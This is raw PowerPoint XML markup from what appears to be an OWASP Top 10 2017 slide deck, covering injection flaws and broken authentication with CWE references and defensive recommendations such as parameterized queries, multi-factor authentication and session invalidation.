              <a:t>ORM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Cheat Sheet:</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Cheat Sheet:</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SQL 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OWASP Cheat Sheet:</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Injection Prevention in Java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OWASP Cheat Sheet:</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Query Parameterization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CWE-77:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>Command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9"/>
              </a:rPr>
              <a:t>CWE-89:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId19"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId19"/>
              </a:rPr>
              <a:t>SQL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0"/>
              </a:rPr>
              <a:t>CWE-564:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId20"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId20"/>
              </a:rPr>
              <a:t>Hibernate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1"/>
              </a:rPr>
              <a:t>CWE-917:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId21"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId21"/>
              </a:rPr>
              <a:t>Expression Language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2"/>
              </a:rPr>
              <a:t>PortS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId23"/>
              </a:rPr>
              <a:t>wigger:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId23"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId23"/>
              </a:rPr>
              <a:t>Server-side template injection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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" dirty="1"/>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positive or "whitelist" server-side input validation.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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>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SQL structure such as table names, column names, and so on cannot be escaped, and thus user-supplied structure names are dangerous.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a common issue in report-writing software.</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24"/>
                        </a:rPr>
                        <a:t>Injection flaws</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occur when an attacker can send hostile data to an interpreter.</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Injection flaws</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="900">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>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are very prevalent, particularly in legacy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Injection vulnerabilities are often found in SQL, LDAP, XPath, or NoSQL queries, OS commands, XML parsers, SMTP headers, expression languages, and ORM queries.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="900">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atin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Injection flaws are easy to discover when examining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Scanners and fuzzers can help attackers find injection flaws.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Injection can sometimes lead to complete host takeover.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1"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the use of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>lists of known passwords</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, is a common attack.</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an application does not implement automated threat or credential stuffing protections, the application can be used as a password oracle to determine if the credentials are valid.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Most authentication attacks occur due to the continued use of passwords as a sole factor.</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Once considered best practices, password rotation and complexity requirements are viewed as encouraging users to use, and reuse, weak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Organizations are recommended to stop these practices per NIST 800-63 and use multi-factor authentication.</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Application session timeouts aren’t set properly.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user uses a public computer to access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selecting “logout” the user simply closes the browser tab and walks away.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the same browser an hour later, and the user is still authenticated.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There may be authentication weaknesses if the application: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automated attacks such as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brute force or other automated attacks.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plain text, encrypted, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>or weakly hashed passwords </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(see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ru-RU" dirty="1" sz="90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properly invalidate Session IDs.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>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Implement Identity and Authentication Controls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ASVS:</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V2 Authentication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9"/>
              </a:rPr>
              <a:t>V3 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Identity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1"/>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OWASP Cheat Sheet:</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Credential Stuffing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OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>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4"/>
              </a:rPr>
              <a:t>Forgot Password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Cheat Sheet:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>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Automated Threats Handbook</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8"/>
              </a:rPr>
              <a:t>NIST 800-63b:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>5.1.1 Memorized Secrets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9"/>
              </a:rPr>
              <a:t>CWE-287:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId19"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId19"/>
              </a:rPr>
              <a:t>Improper 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20"/>
              </a:rPr>
              <a:t>CWE-384:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId20"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId20"/>
              </a:rPr>
              <a:t>Session Fixation</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ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId21"/>
              </a:rPr>
              <a:t>top 10000 worst passwords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ru-RU" dirty="1" sz="90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ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> or other modern, evidence based password policies.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Limit or increasingly delay failed login attempts.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Log all failures and alert administrators when credential stuffing, brute force, or other attacks are detected.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Use a server-side, secure,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>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Session IDs should not be in the URL, be securely stored and invalidated after logout, idle, and absolute timeouts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="90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A2</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Session management attacks are well understood, particularly in relation to unexpired session tokens.</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Session manage-ment is the bedrock of authentication and access controls, and is present in all stateful </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="900">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>applications</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1"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ru-RU" dirty="1" baseline="0" sz="900">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>attacks</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="90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dirty="1" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Attackers have to gain access to only a few accounts, or just one admin account to compromise the system.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Depending on the domain of the application, this may allow money laundering, social security fraud, and identity theft, or disclose legally protected highly sensitive information.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12255</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Neil Smithline</cp:lastModifiedBy>
  <cp:revision>1871</cp:revision>
  <cp:lastPrinted>2017-11-16T20:35:31Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2009-08-17T12:51:41Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-11-20T17:18:43Z</dcterms:modified>
  <cp:contentStatus>RC2_RCC1</cp:contentStatus>
</cp:coreProperties>
</file>